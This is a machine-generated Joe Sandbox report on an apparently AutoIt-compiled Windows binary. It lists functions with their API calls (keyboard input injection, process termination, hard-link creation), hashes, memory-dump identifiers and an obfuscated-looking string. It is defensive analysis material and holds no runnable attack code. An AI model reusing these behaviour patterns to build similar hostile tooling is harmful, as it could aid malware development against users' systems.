                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                            • String ID:
                                            • API String ID: 603618608-0
                                            • Opcode ID: 31c30015aa0f8dc286e7a51a7d06d227912079fe60632e0061cd035bb514714a
                                            • Instruction ID: c2ad4a5ad1e5bb1309305ce916e98bebbcf54b0ae10fb51fabdf518b85f7c991
                                            • Opcode Fuzzy Hash: 31c30015aa0f8dc286e7a51a7d06d227912079fe60632e0061cd035bb514714a
                                            • Instruction Fuzzy Hash: D10171B5A00719BBEB109BA98C45A5EBFA8FB48351F004066EA04E72D0D6709C008BA1
                                            Function 00827B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __init_pointers.LIBCMT ref: 00827B47
                                              • Part of subcall function 0082123A: __initp_misc_winsig.LIBCMT ref: 0082125E
                                              • Part of subcall function 0082123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00827F51
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00827F65
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00827F78
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00827F8B
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00827F9E
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00827FB1
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00827FC4
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00827FD7
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00827FEA
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00827FFD
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00828010
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00828023
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00828036
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00828049
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0082805C
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0082806F
                                            • __mtinitlocks.LIBCMT ref: 00827B4C
                                              • Part of subcall function 00827E23: InitializeCriticalSectionAndSpinCount.KERNEL32(008BAC68,00000FA0,?,?,00827B51,00825E77,008B6C70,00000014), ref: 00827E41
                                            • __mtterm.LIBCMT ref: 00827B55
                                              • Part of subcall function 00827BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00827B5A,00825E77,008B6C70,00000014), ref: 00827D3F
                                              • Part of subcall function 00827BBD: _free.LIBCMT ref: 00827D46
                                              • Part of subcall function 00827BBD: DeleteCriticalSection.KERNEL32(008BAC68,?,?,00827B5A,00825E77,008B6C70,00000014), ref: 00827D68
                                            • __calloc_crt.LIBCMT ref: 00827B7A
                                            • GetCurrentThreadId.KERNEL32 ref: 00827BA3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                            • String ID:
                                            • API String ID: 2942034483-0
                                            • Opcode ID: 3e7572bd4a5929d7c338be38efa80ba7802a7a45c6de4019cfe6137f04ff9dcb
                                            • Instruction ID: fc2a615fd43dc464bf0ee4964cc0e779d3540e50095c9edaa8bc684c93484b0f
                                            • Opcode Fuzzy Hash: 3e7572bd4a5929d7c338be38efa80ba7802a7a45c6de4019cfe6137f04ff9dcb
                                            • Instruction Fuzzy Hash: 82F0907210D7321AEA28777F7C46A4A2784FF01730F2106A9FD60C51D2FF2188C14172
                                            Function 008027EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0080281D
                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00802825
                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00802830
                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0080283B
                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00802843
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080284B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Virtual
                                            • String ID:
                                            • API String ID: 4278518827-0
                                            • Opcode ID: dd91b4dc79cdae2958992f53f97f224710636caed0c5aae629a46c840d6fa263
                                            • Instruction ID: 284564454b3b6ce7bacfe3ab1fa31dde96dfecb4c748d5a00423a6b20f0afb3f
                                            • Opcode Fuzzy Hash: dd91b4dc79cdae2958992f53f97f224710636caed0c5aae629a46c840d6fa263
                                            • Instruction Fuzzy Hash: 36016CB0901B5D7DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
                                            Function 00849AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 1423608774-0
                                            • Opcode ID: fb6678790c853a57dee7f07dd350aea2e95179803f65ed2f23637dc1d0df814c
                                            • Instruction ID: 2647de15a835ffc5f5e16537b5fe0bcc2b5d53860674f54cb2f4475075aaaa92
                                            • Opcode Fuzzy Hash: fb6678790c853a57dee7f07dd350aea2e95179803f65ed2f23637dc1d0df814c
                                            • Instruction Fuzzy Hash: CB018132142321ABDB256B5CEC48DEB777AFF88712B040529F543D21E0DB64A800DB50
                                            Function 00847BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00847C07
                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00847C1D
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00847C2C
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00847C3B
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00847C45
                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00847C4C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                            • String ID:
                                            • API String ID: 839392675-0
                                            • Opcode ID: d31f37c195dc049155669d60dd3cbbdc26b6dfc4d93f414d177bc1cedc798f0a
                                            • Instruction ID: 506e4fb11f330cded927b9b811e3023983cc9ecfb78915749cd1493af0b475dc
                                            • Opcode Fuzzy Hash: d31f37c195dc049155669d60dd3cbbdc26b6dfc4d93f414d177bc1cedc798f0a
                                            • Instruction Fuzzy Hash: BDF03A76241258BBE7215B969C0EEEF7B7CFFC6B21F000018FA01D1091E7A05A41C7B5
                                            Function 00849A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,?), ref: 00849A33
                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A44
                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A51
                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A5E
                                              • Part of subcall function 008493D1: CloseHandle.KERNEL32(?,?,00849A6B,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 008493DB
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00849A71
                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3495660284-0
                                            • Opcode ID: 1264bae6addf1458771aaa88d6c88128d34d17a2e79d4306622000104789c2ad
                                            • Instruction ID: f97694918806e2590411cb65d9b5f685112cd47f32a87ee1c86ae0b4df21d7da
                                            • Opcode Fuzzy Hash: 1264bae6addf1458771aaa88d6c88128d34d17a2e79d4306622000104789c2ad
                                            • Instruction Fuzzy Hash: 86F08C32181311ABD7612BACEC8DEEB773AFF89312B140425F603A10E1DBB5A801DB60
                                            Function 00801CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081F4EA: std::exception::exception.LIBCMT ref: 0081F51E
                                              • Part of subcall function 0081F4EA: __CxxThrowException@8.LIBCMT ref: 0081F533
                                            • __swprintf.LIBCMT ref: 00801EA6
                                            Strings
                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00801D49
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                            • API String ID: 2125237772-557222456
                                            • Opcode ID: 58274ec5bceaf577b6c1d64f4c8c0c0f2fc9b7ac331bc9aeb1370a46185dc96e
                                            • Instruction ID: 76b292ec97475705569fc698a3e3fab1db25202c71f2a5cea79f6a34dd4eb536
                                            • Opcode Fuzzy Hash: 58274ec5bceaf577b6c1d64f4c8c0c0f2fc9b7ac331bc9aeb1370a46185dc96e
                                            • Instruction Fuzzy Hash: F49159711042019FCB64EF28CC9986EB7A8FF95710F10491DF989D72E2DB61ED44CB92
                                            Function 0085AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 0085B006
                                            • CharUpperBuffW.USER32(?,?), ref: 0085B115
                                            • VariantClear.OLEAUT32(?), ref: 0085B298
                                              • Part of subcall function 00849DC5: VariantInit.OLEAUT32(00000000), ref: 00849E05
                                              • Part of subcall function 00849DC5: VariantCopy.OLEAUT32(?,?), ref: 00849E0E
                                              • Part of subcall function 00849DC5: VariantClear.OLEAUT32(?), ref: 00849E1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                            • API String ID: 4237274167-1221869570
                                            • Opcode ID: 0da797c8fc99c7e904fab115cbb34b4fc4dd658a6ed2672152f3ffcb4fe62938
                                            • Instruction ID: f1aff63ec9eef7291fbec643b00e85faee1f3cd274f7a334e4345a3a7c891e37
                                            • Opcode Fuzzy Hash: 0da797c8fc99c7e904fab115cbb34b4fc4dd658a6ed2672152f3ffcb4fe62938
                                            • Instruction Fuzzy Hash: 8F917C706083059FCB10DF28C49195ABBE4FF98704F04496DF89ADB3A2DB31E949CB52
                                            Function 00845347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081C6F4: _wcscpy.LIBCMT ref: 0081C717
                                            • _memset.LIBCMT ref: 00845438
                                            • GetMenuItemInfoW.USER32(?), ref: 00845467
                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00845513
                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0084553D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                            • String ID: 0
                                            • API String ID: 4152858687-4108050209
                                            • Opcode ID: 1bcbb24bd2e6dde39699e5529921798cb3d3c1ac4087e0499d9b989efaee2af5
                                            • Instruction ID: 56947d6cfab83e993bd7c1ed540673674530f0575b2c0c382ea5a5d513156ad4
                                            • Opcode Fuzzy Hash: 1bcbb24bd2e6dde39699e5529921798cb3d3c1ac4087e0499d9b989efaee2af5
                                            • Instruction Fuzzy Hash: B051EEB1204B099BD7149F28C885BBFB7E8FB86314F04062AF895D72D3DB60CD448B92
                                            Function 00840213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0084027B
                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008402B1
                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008402C2
                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00840344
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                            • String ID: DllGetClassObject
                                            • API String ID: 753597075-1075368562
                                            • Opcode ID: f978433dfa2a56ef00e5c45d77a6557577a43a25dceaacd4388c116111e16289
                                            • Instruction ID: 0d16dca9f9e2558bc8cdce6521afa7768cc604528bd3ebf194e75a0fb71553d6
                                            • Opcode Fuzzy Hash: f978433dfa2a56ef00e5c45d77a6557577a43a25dceaacd4388c116111e16289
                                            • Instruction Fuzzy Hash: 82414A71600209EFDB15DF58C884A9BBBB9FF44315B1480A9EA09DF246D7B1DD44CFA0
                                            Function 00845007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00845075
                                            • GetMenuItemInfoW.USER32 ref: 00845091
                                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 008450D7
                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008C1708,00000000), ref: 00845120
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Menu$Delete$InfoItem_memset
                                            • String ID: 0
                                            • API String ID: 1173514356-4108050209
                                            • Opcode ID: 430b14cf1a1edc324618d2b58d3b5306ea1512d91911e31869111026a2a6f4dd
                                            • Instruction ID: 90a0c3b966586dafcda908db6eddc8a3826d8bcc65f3f71a36e2033253bc5dd4
                                            • Opcode Fuzzy Hash: 430b14cf1a1edc324618d2b58d3b5306ea1512d91911e31869111026a2a6f4dd
                                            • Instruction Fuzzy Hash: 06417A752057459FD7209F28D884B6EB7A4FF89724F144A1EF895D7292D730A900CB62
                                            Function 0084390C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112keyboardwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00843966
                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00843982
                                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 008439EF
                                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00843A4D
                                            Strings
                                            • aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5, xrefs: 0084399D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID: aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 432972143-3175721085
                                            • Opcode ID: 5d7654d526c7d82ba36bb47ed6f7eaca9b9556e8bc4a8aaee98d8012acdaad87
                                            • Instruction ID: 351aaa4de5142f4f5b6d44a43be6a5e3615d2fbc52c9ff88408ec59a0610f206
                                            • Opcode Fuzzy Hash: 5d7654d526c7d82ba36bb47ed6f7eaca9b9556e8bc4a8aaee98d8012acdaad87
                                            • Instruction Fuzzy Hash: D441F370A4425CAAEF218B688806BFDBFB9FB56320F04015AF5C1D62C1C7B48E85D766
                                            Function 0084E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0084E742
                                            • GetLastError.KERNEL32(?,00000000), ref: 0084E768
                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0084E78D
                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0084E7B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                            • String ID: p1Wu`KXu
                                            • API String ID: 3321077145-4063981602
                                            • Opcode ID: efc0f5a6a0d555bdfdf66f741b2f4182bdc163d5e0439e2d71a087bc6497e8e1
                                            • Instruction ID: 8ad9988fd27373dbdfbe5381115eec8e93b91caef35479a383b420366fb04f4e
                                            • Opcode Fuzzy Hash: efc0f5a6a0d555bdfdf66f741b2f4182bdc163d5e0439e2d71a087bc6497e8e1
                                            • Instruction Fuzzy Hash: 49411639600614DFCB11EF19C44494DBBE5FF59720B09C498E986AB3A2CB70FD40CB92
                                            Function 00843A61 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104keyboardwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00843AB8
                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00843AD4
                                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00843B34
                                            • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00843B92
                                            Strings
                                            • aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5, xrefs: 00843AF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID: aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 432972143-3175721085
                                            • Opcode ID: 4652e27fab414129629d43743b81aaebe086b55ab0989f94250a15ab02472b91
                                            • Instruction ID: 690efb29c1897986b7a834f31689405dff8af140f949801eb3efcef7cf5a2944
                                            • Opcode Fuzzy Hash: 4652e27fab414129629d43743b81aaebe086b55ab0989f94250a15ab02472b91
                                            • Instruction Fuzzy Hash: EA310430A0425CAEEF218B688819BFEBBA5FB55334F44015AE481E32D2D7748B45D762
                                            Function 00860567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
